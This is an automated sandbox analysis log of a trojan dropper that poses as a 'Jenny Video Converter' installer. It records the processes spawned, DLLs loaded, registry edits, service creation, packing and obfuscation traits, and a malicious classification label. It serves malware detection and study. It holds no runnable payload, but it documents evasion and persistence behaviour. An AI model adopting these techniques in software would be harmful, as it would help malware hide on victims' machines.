        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00408C14 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00406ACC appears 41 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00403400 appears 61 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00445DE4 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 004078FC appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 004344EC appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00403494 appears 82 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00457D58 appears 73 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00453330 appears 93 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00457B4C appears 98 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 00403684 appears 221 times
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: String function: 004460B4 appears 59 times
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: String function: 02E38AE0 appears 37 times
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: String function: 02E45330 appears 139 times
        Source: ZFllSoXpoT.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: ZFllSoXpoT.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: ZFllSoXpoT.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: ZFllSoXpoT.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: ZFllSoXpoT.tmp.0.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-GTTMJ.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-GTTMJ.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-GTTMJ.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-GTTMJ.tmp.3.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-SKU3B.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-OBUNB.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-V1USB.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-546FI.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-KPRR4.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-89P6A.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-A3JAA.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-802JP.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-QGIC5.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-K6NUN.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: is-K6ASR.tmp.3.drStatic PE information: Number of sections : 11 > 10
        Source: ZFllSoXpoT.exe, 00000000.00000003.1311021489.0000000002114000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs ZFllSoXpoT.exe
        Source: ZFllSoXpoT.exe, 00000000.00000003.1310859620.0000000002330000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs ZFllSoXpoT.exe
        Source: ZFllSoXpoT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: _RegDLL.tmp.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.evad.winEXE@14/71@2/2
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_02E308B8 FormatMessageA,GetLastError,8_2_02E308B8
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_004555D0
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,3_2_00455DF8
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_00402524
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0046E38C GetVersion,CoCreateInstance,3_2_0046E38C
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,0_2_00409BEC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_0040224F lstrcmpiW,SetEvent,StartServiceCtrlDispatcherA,8_2_0040224F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_0040224F lstrcmpiW,SetEvent,StartServiceCtrlDispatcherA,8_2_0040224F
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_0040B218 StartServiceCtrlDispatcherA,8_2_0040B218
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeCode function: 8_2_004021F7 StartServiceCtrlDispatcherA,8_2_004021F7
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile created: C:\Users\user\AppData\Local\Jenny Video ConverterJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3876:120:WilError_03
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpFile read: C:\Windows\win.iniJump to behavior
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeFile read: C:\Users\user\Desktop\ZFllSoXpoT.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ZFllSoXpoT.exe "C:\Users\user\Desktop\ZFllSoXpoT.exe"
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp "C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe"
        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe" -i
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeProcess created: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp "C:\Users\user~1\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmp" /SL5="$10408,4236485,54272,C:\Users\user\Desktop\ZFllSoXpoT.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpProcess created: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe "C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exe" -iJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: w32time.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vmictimeprovider.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: explorerframe.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dllJump to behavior
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: ZFllSoXpoT.exeStatic file information: File size 4517785 > 1048576

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeUnpacked PE file: 8.2.jennyvideoconverter32.exe.400000.0.unpack .text:EW;.rdata:R;_cde_3:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32.exeUnpacked PE file: 8.2.jennyvideoconverter32.exe.400000.0.unpack
        Source: is-4NH58.tmp.3.drStatic PE information: 0x8C00008C [Mon Jun 6 07:19:40 2044 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_004502AC
        Source: jennyvideoconverter32.exe.3.drStatic PE information: section name: _cde_3
        Source: is-CJ5EH.tmp.3.drStatic PE information: section name: /4
        Source: is-802JP.tmp.3.drStatic PE information: section name: /4
        Source: is-SKU3B.tmp.3.drStatic PE information: section name: /4
        Source: is-GVVRD.tmp.3.drStatic PE information: section name: /4
        Source: is-UNA71.tmp.3.drStatic PE information: section name: /4
        Source: is-K7E1C.tmp.3.drStatic PE information: section name: /4
        Source: is-89P6A.tmp.3.drStatic PE information: section name: /4
        Source: is-4NH58.tmp.3.drStatic PE information: section name: /4
        Source: is-LKHV4.tmp.3.drStatic PE information: section name: /4
        Source: is-K6ASR.tmp.3.drStatic PE information: section name: /4
        Source: is-HU6GR.tmp.3.drStatic PE information: section name: /4
        Source: is-V1USB.tmp.3.drStatic PE information: section name: /4
        Source: is-1GTV3.tmp.3.drStatic PE information: section name: /4
        Source: is-KPRR4.tmp.3.drStatic PE information: section name: /4
        Source: is-K6NUN.tmp.3.drStatic PE information: section name: /4
        Source: is-A3JAA.tmp.3.drStatic PE information: section name: /4
        Source: is-546FI.tmp.3.drStatic PE information: section name: /4
        Source: is-PC21V.tmp.3.drStatic PE information: section name: /4
        Source: is-OBUNB.tmp.3.drStatic PE information: section name: /4
        Source: is-K7K0E.tmp.3.drStatic PE information: section name: /4
        Source: is-C5452.tmp.3.drStatic PE information: section name: /4
        Source: is-JNPGG.tmp.3.drStatic PE information: section name: /4
        Source: is-6D3ET.tmp.3.drStatic PE information: section name: /4
        Source: is-RSP19.tmp.3.drStatic PE information: section name: /4
        Source: is-2700D.tmp.3.drStatic PE information: section name: /4
        Source: is-QGIC5.tmp.3.drStatic PE information: section name: /4
        Source: is-J93O6.tmp.3.drStatic PE information: section name: /4
        Source: ET Ammeter Side 10.7.46.exe.8.drStatic PE information: section name: _cde_3
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\ZFllSoXpoT.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00409954 push 00409991h; ret 3_2_00409989
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040A04F push ds; ret 3_2_0040A050
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040A023 push ds; ret 3_2_0040A04D
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00460088 push ecx; mov dword ptr [esp], ecx3_2_0046008C
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004062CC push ecx; mov dword ptr [esp], eax3_2_004062CD
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0049467C push ecx; mov dword ptr [esp], ecx3_2_00494681
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004106E0 push ecx; mov dword ptr [esp], edx3_2_004106E5
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00412938 push 0041299Bh; ret 3_2_00412993
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_0040D038 push ecx; mov dword ptr [esp], edx3_2_0040D03A
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_004850AC push ecx; mov dword ptr [esp], ecx3_2_004850B1
        Source: C:\Users\user\AppData\Local\Temp\is-J24J8.tmp\ZFllSoXpoT.tmpCode function: 3_2_00443450 push ecx; mov dword ptr [esp], ecx3_2_00443454
